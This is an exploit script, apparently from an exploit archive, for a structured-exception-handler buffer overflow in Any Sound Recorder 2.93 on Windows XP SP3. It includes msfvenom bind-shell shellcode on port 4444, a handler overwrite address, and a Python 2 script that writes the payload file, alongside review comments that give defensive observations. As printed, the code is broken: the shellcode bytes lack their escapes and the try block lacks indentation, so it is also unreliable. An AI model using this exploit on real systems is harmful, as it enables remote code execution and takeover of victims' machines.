# Exploit Title: Any Sound Recorder 2.93 - Buffer Overflow (SEH)
# Exploit Author: Abdullah Alic
# Discovery Date: 2018-10-16
# Homepage: http://www.any-sound-recorder.com
# Software Link: http://www.any-sound-recorder.com/anysoundrecorder.exe
# Version: 2.93
# Tested on: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the python exploit script, it will create a new file
# with the name "boom.txt". Copy the content of the "boom.txt".
# Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register"
# Connect victim machine on port 4444

#!/usr/bin/python

#Payload size: 355 bytes
#msfvenom -p windows/shell_bind_tcp -b "x00x0ax0d" -f python
# Shellcode blob emitted by the msfvenom command above: a Windows bind shell,
# i.e. on success the target process opens a listening TCP socket (the header
# names port 4444). For defenders the observable is the recorder process
# owning a network listener and spawning a command interpreter.
# NOTE(review): in this copy the strings read as literal "x.." text, so the
# 355-byte size quoted above cannot be confirmed from the listing itself.
buf = ""
buf += "xb8x67x21x25x53xddxc0xd9x74x24xf4x5bx31"
buf += "xc9xb1x53x31x43x12x03x43x12x83x8cxddxc7"
buf += "xa6xaexf6x8ax49x4ex07xebxc0xabx36x2bxb6"
buf += "xb8x69x9bxbcxecx85x50x90x04x1dx14x3dx2b"
buf += "x96x93x1bx02x27x8fx58x05xabxd2x8cxe5x92"
buf += "x1cxc1xe4xd3x41x28xb4x8cx0ex9fx28xb8x5b"
buf += "x1cxc3xf2x4ax24x30x42x6cx05xe7xd8x37x85"
buf += "x06x0cx4cx8cx10x51x69x46xabxa1x05x59x7d"
buf += "xf8xe6xf6x40x34x15x06x85xf3xc6x7dxffx07"
buf += "x7ax86xc4x7axa0x03xdexddx23xb3x3axdfxe0"
buf += "x22xc9xd3x4dx20x95xf7x50xe5xaex0cxd8x08"
buf += "x60x85x9ax2exa4xcdx79x4exfdxabx2cx6fx1d"
buf += "x14x90xd5x56xb9xc5x67x35xd6x2ax4axc5x26"
buf += "x25xddxb6x14xeax75x50x15x63x50xa7x5ax5e"
buf += "x24x37xa5x61x55x1ex62x35x05x08x43x36xce"
buf += "xc8x6cxe3x7bxc0xcbx5cx9ex2dxabx0cx1ex9d"
buf += "x44x47x91xc2x75x68x7bx6bx1dx95x84x82x82"
buf += "x10x62xcex2ax75x3cx66x89xa2xf5x11xf2x80"
buf += "xadxb5xbbxc2x6axbax3bxc1xdcx2cxb0x06xd9"
buf += "x4dxc7x02x49x1ax50xd8x18x69xc0xddx30x19"
buf += "x61x4fxdfxd9xecx6cx48x8exb9x43x81x5ax54"
buf += "xfdx3bx78xa5x9bx04x38x72x58x8axc1xf7xe4"
buf += "xa8xd1xc1xe5xf4x85x9dxb3xa2x73x58x6ax05"
buf += "x2dx32xc1xcfxb9xc3x29xd0xbfxcbx67xa6x5f"
buf += "x7dxdexffx60xb2xb6xf7x19xaex26xf7xf0x6a"
buf += "x56xb2x58xdaxffx1bx09x5ex62x9cxe4x9dx9b"
buf += "x1fx0cx5ex58x3fx65x5bx24x87x96x11x35x62"
buf += "x98x86x36xa7"

# Layout of the string that the header says is pasted into the "User Name"
# registration field: filler, the two SEH-record fields, the payload, then
# trailing padding whose repeat count is junk minus len(buf).
# NOTE(review): the root cause is presumably an unbounded copy of the user name
# into a fixed-size stack buffer; the real fix is a length check in the
# application, which this page does not show.
junk = 10000
# nseh/seh stand for the "next handler" and "handler" fields of the exception
# registration record that the overflow overwrites.
nseh= "xebx06x90x90" # SHORT JMP 6 bytes
# The handler value is a fixed address inside msacm32.drv. The header lists
# Windows XP Professional SP3 as the only tested system; SafeSEH, SEHOP and
# ASLR are the platform mitigations aimed at this class of handler overwrite
# (whether that module opts into any of them is not shown here -- confirm).
seh= "x35x2fxd1x72" # 0x72d12f35 : pop ebx # pop ebp # ret 0x0c FROM msacm32.drv

# NOTE: the name `buffer` shadows the Python 2 builtin of the same name.
buffer = "x90" * 900 + nseh + seh + buf + "x90" * (junk-len(buf))
# Plain alias; payload and buffer refer to the same string.
payload = buffer

# Byte values excluded from the encoded payload (same set as the -b option of
# the msfvenom command in the header comment).
#badchars x00 x0a x0d

# Writes the assembled string to boom.txt in the current working directory and
# prints its length. Uses Python 2 print statements.
# NOTE(review): as printed, the try/except bodies carry no indentation, so this
# listing does not parse as-is. The bare except also hides the actual failure
# (permissions, disk full, even KeyboardInterrupt), and f is left open if
# write() raises.
try:
f=open("boom.txt","w")
print "[+] Creating %s bytes payload..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"